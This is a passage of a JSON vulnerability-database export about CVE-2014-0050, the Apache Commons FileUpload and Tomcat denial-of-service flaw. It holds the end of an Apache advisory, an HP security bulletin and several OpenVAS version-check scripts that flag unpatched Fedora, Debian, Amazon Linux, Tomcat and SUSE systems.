http://svn.apache.org/r1565143\r\n - Tomcat 8: http://svn.apache.org/r1565163\r\n - Tomcat 7: http://svn.apache.org/r1565169\r\n- - Limit the size of the Content-Type header to less than 4091 bytes\r\n\r\nCredit:\r\nThis issue was reported to the Apache Software Foundation via JPCERT.\r\n\r\nReferences:\r\n[1] http://markmail.org/message/kpfl7ax4el2owb3o\r\n[2] http://tomcat.apache.org/security-8.html\r\n[3] http://tomcat.apache.org/security-7.html\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQIcBAEBAgAGBQJS83P8AAoJEBDAHFovYFnnbOwP/0m80St7x63n6VCiR0aGuGLz\r\n/J004spHfbc+vtg2RumObBTX6mSfvPgO2R4FzE17Etg8QtWreoxb7kjnVXUwjdMX\r\nnb3Yt6IY1yBW1K+YcZRziOQXkRnnjnpC7Lh2o5eqpJ1S7wpXl5PBIXYSxMAsJCuv\r\naxFA0aq5cc17uDAH1z6DPk4149oZz2lHdlBUTTkCh/0PrvcIFxwpej75gUfyaV0y\r\nDGZLs3IpRYcJMS131q72DUt9wBsIqJN0mqUOq2svBS3mlXBcKDjy21b8QiEr8itK\r\nUqwsYUtOZP4nZ4u8j6euxF2fC/ivm/930OGOl9pn2SbkoHJKm/4rz2GYDA9jq07K\r\nXEDeGdTx3ZuDaTaBER8xquETRZ/Rb8dbBxQwzmo6doJNOjsMQFlR+1F+p56AhYd0\r\nklbT6Q7i/Ic3BdRJkUpaYshhtXeAOnH+0u9j4kRXMgJbkMgOacopomFX6HoXr9/i\r\nRHGbwwSZViLooR88Yg0FU2230+9mJLXxaJ6usHrtq4dS9ElSV320OCyisNjMX5hi\r\n5SFYMSy+z0nsK2O6yCzlukztoFhvaNecvy3I8w5EKytweyFlPzxXn6QpQjG+ffb5\r\nql7TZRrApiaewp4crzBcZSAjDzRNiQpcI2xTTN/H9u/yk8lrhOULi4pljKCudvmM\r\neIWblFdpoPVl0iqvsXA9\r\n=uzLf\r\n-----END PGP SIGNATURE-----\r\n", "edition": 1, "modified": "2014-03-31T00:00:00", "published": "2014-03-31T00:00:00", "id": "SECURITYVULNS:DOC:30435", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30435", "title": "[SECURITY] CVE-2014-0050 Apache Commons FileUpload and Apache Tomcat DoS", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04657823\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04657823\r\nVersion: 1\r\n\r\nHPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS),\r\nDistributed Denial of Service (DDoS)\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2015-05-11\r\nLast Updated: 2015-05-11\r\n\r\nPotential Security Impact: Remote Denial of Service (DoS), Distributed Denial\r\nof Service (DDoS)\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP SDN VAN\r\nController. The vulnerabilities could be remotely exploited resulting in\r\nDenial of Service (DoS) or a Distributed Denial of Service (DDoS).\r\n\r\nReferences:\r\n\r\n CVE-2014-0050 Remote Denial of Service (DoS)\r\n\r\n CVE-2015-2122 Remote Distributed Denial of Service (DDoS)\r\n\r\n SSRT102049\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP SDN VAN Controller version 2.5 and earlier.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0050 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0\r\nCVE-2015-2122 (AV:N/AC:L/Au:N/C:N/I:N/A:C) 7.8\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP recommends either of the two following workarounds for the vulnerabilities\r\nin the HP SDN VAN Controller.\r\n\r\n - The network for the server running the HP SDN VAN Controller management\r\nVLAN should be on a separate and isolated "management" VLAN.\r\n\r\n - Configure the firewall on the server running HP SDN VAN Controller so\r\nthat the only network traffic allowed to the REST port is from trusted\r\nservers on the network that need to use the REST layer. For example: the\r\nMicrosoft Lync Server for Optimizer.\r\n\r\n For more detailed information, please refer to the "Securing REST layer\r\nAccess on HP VAN SDN Controllers" article at the following location:\r\n\r\n http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=em\r\nr_na-c04676756\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 11 May 2015 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2015 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlVQ3n0ACgkQ4B86/C0qfVleJgCg+qPCFTzdKRL5cLe4eNH7Q82V\r\nw80AoOpSvjMM19ssS++abLKV1S+kypwk\r\n=Wtwj\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:DOC:32033", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32033", "title": "[security bulletin] HPSBGN03329 rev.1 - HP SDN VAN Controller, Remote Denial of Service (DoS), Distributed Denial of Service (DDoS)", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:00", "bulletinFamily": "software", "cvelist": ["CVE-2015-2122", "CVE-2014-0050"], "description": "No description provided", "edition": 1, "modified": "2015-05-11T00:00:00", "published": "2015-05-11T00:00:00", "id": "SECURITYVULNS:VULN:14470", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14470", "title": "HP SDN VAN Controller DoS", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2017-07-25T10:48:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "Check for the Version of apache-commons-fileupload", "modified": "2017-07-10T00:00:00", "published": "2014-02-20T00:00:00", "id": "OPENVAS:867523", "href": "http://plugins.openvas.org/nasl.php?oid=867523", "type": "openvas", "title": "Fedora Update for apache-commons-fileupload FEDORA-2014-2175", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for apache-commons-fileupload FEDORA-2014-2175\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867523);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-02-20 15:08:39 +0530 (Thu, 20 Feb 2014)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for apache-commons-fileupload FEDORA-2014-2175\");\n\n tag_insight = \"The javax.servlet package lacks support for rfc 1867, html file\nupload. This package provides a simple to use api for working with\nsuch data. The scope of this package is to create a package of Java\nutility classes to read multipart/form-data within a\njavax.servlet.http.HttpServletRequest\n\";\n\n tag_affected = \"apache-commons-fileupload on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-2175\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-February/128499.html\");\n script_summary(\"Check for the Version of apache-commons-fileupload\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"apache-commons-fileupload\", rpm:\"apache-commons-fileupload~1.3~5.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.", "modified": "2017-07-11T00:00:00", "published": "2014-02-07T00:00:00", "id": "OPENVAS:702856", "href": "http://plugins.openvas.org/nasl.php?oid=702856", "type": "openvas", "title": "Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2856.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 2856-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"libcommons-fileupload-java on Debian Linux\";\ntag_insight = \"The Commons FileUpload package makes it easy to add robust, high-performance,\nfile upload capability to your servlets and web applications.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 1.2.2-1+deb6u2.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 1.2.2-1+deb7u2.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.3.1-1.\n\nWe recommend that you upgrade your libcommons-fileupload-java packages.\";\ntag_summary = \"It was discovered that the Apache Commons FileUpload package for Java\ncould enter an infinite loop while processing a multipart request with\na crafted Content-Type, resulting in a denial-of-service condition.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702856);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-0050\");\n script_name(\"Debian Security Advisory DSA 2856-1 (libcommons-fileupload-java - denial of service)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-02-07 00:00:00 +0100 (Fri, 07 Feb 2014)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2856.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb6u2\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libcommons-fileupload-java-doc\", ver:\"1.2.2-1+deb7u2\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-17T23:01:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120359", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120359", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2014-312)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120359\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:34 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2014-312)\");\n script_tag(name:\"insight\", value:\"MultipartStream.java in Apache Commons FileUpload before 1.3.1, as used in Apache Tomcat, JBoss Web, and other products, allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a crafted Content-Type header that bypasses a loop's intended exit conditions.\");\n script_tag(name:\"solution\", value:\"Run yum update tomcat7 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-312.html\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-docs-webapp\", rpm:\"tomcat7-docs-webapp~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-lib\", rpm:\"tomcat7-lib~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-webapps\", rpm:\"tomcat7-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-el-2.2-api\", rpm:\"tomcat7-el-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-javadoc\", rpm:\"tomcat7-javadoc~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-jsp-2.2-api\", rpm:\"tomcat7-jsp-2.2-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-admin-webapps\", rpm:\"tomcat7-admin-webapps~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7-servlet-3.0-api\", rpm:\"tomcat7-servlet-3.0-api~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"tomcat7\", rpm:\"tomcat7~7.0.47~1.38.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "This host is running Apache Tomcat and is prone to denial of service\n vulnerability.", "modified": "2019-05-10T00:00:00", "published": "2014-03-24T00:00:00", "id": "OPENVAS:1361412562310804251", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804251", "type": "openvas", "title": "Apache Tomcat Content-Type Header Denial Of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_tomcat_content_type_hdr_dos_vuln.nasl 35236 2014-03-24 15:09:34Z mar$\n#\n# Apache Tomcat Content-Type Header Denial Of Service Vulnerability\n#\n# Authors:\n# Shashi Kiran N <nskiran@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:tomcat\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804251\");\n script_version(\"2019-05-10T11:41:35+0000\");\n script_cve_id(\"CVE-2014-0050\");\n script_bugtraq_id(65400);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-05-10 11:41:35 +0000 (Fri, 10 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-03-24 15:09:34 +0530 (Mon, 24 Mar 2014)\");\n script_name(\"Apache Tomcat Content-Type Header Denial Of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_apache_tomcat_consolidation.nasl\");\n script_mandatory_keys(\"apache/tomcat/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/56830\");\n script_xref(name:\"URL\", value:\"http://xforce.iss.net/xforce/xfdb/90987\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/31615\");\n script_xref(name:\"URL\", value:\"http://blog.spiderlabs.com/2014/02/cve-2014-0050-exploit-with-boundaries-loops-without-boundaries.html\");\n\n script_tag(name:\"summary\", value:\"This host is running Apache Tomcat and is prone to denial of service\n vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an improper handling of Content-Type HTTP header for\n multipart requests\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to cause denial of\n service condition.\");\n\n script_tag(name:\"affected\", value:\"Apache Tomcat version 7.0.x before 7.0.51 and 8.0.0 before 8.0.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to 7.0.51, 8.0.2 or later.\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( isnull( port = get_app_port( cpe:CPE ) ) )\n exit( 0 );\n\nif( ! infos = get_app_version_and_location( cpe:CPE, port:port, exit_no_version:TRUE ) )\n exit( 0 );\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif( version_in_range( version:vers, test_version:\"7.0.0\", test_version2:\"7.0.50\" ) ||\n version_in_range( version:vers, test_version:\"8.0.0.RC1\", test_version2:\"8.0.1\" ) ) {\n report = report_fixed_ver( installed_version:vers, fixed_version:\"7.0.51/8.0.2\", install_path:path );\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-31T18:37:35", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-0050"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2015-10-13T00:00:00", "id": "OPENVAS:1361412562310850747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850747", "type": "openvas", "title": "SUSE: Security Advisory for jakarta-commons-fileupload (SUSE-SU-2014:0548-1)", "sourceData": "# Copyright (C) 2015 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850747\");\n script_version(\"2020-01-31T07:58:03+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 07:58:03 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-10-13 18:35:00 +0530 (Tue, 13 Oct 2015)\");\n script_cve_id(\"CVE-2014-0050\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SUSE: Security Advisory for jakarta-commons-fileupload (SUSE-SU-2014:0548-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jakarta-commons-fileupload'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update fixes a security issue with\n jakarta-commons-fileupload:\n\n * bnc#862781: denial of service due to too-small buffer\n size used (CVE-2014-0050)\n\n Security Issue reference:\n\n * CVE-2014-0050\");\n\n script_tag(name:\"affected\", value:\"jakarta-commons-fileupload on SUSE Linux Enterprise Server 11 SP3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"SUSE-SU\", value:\"2014:0548-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 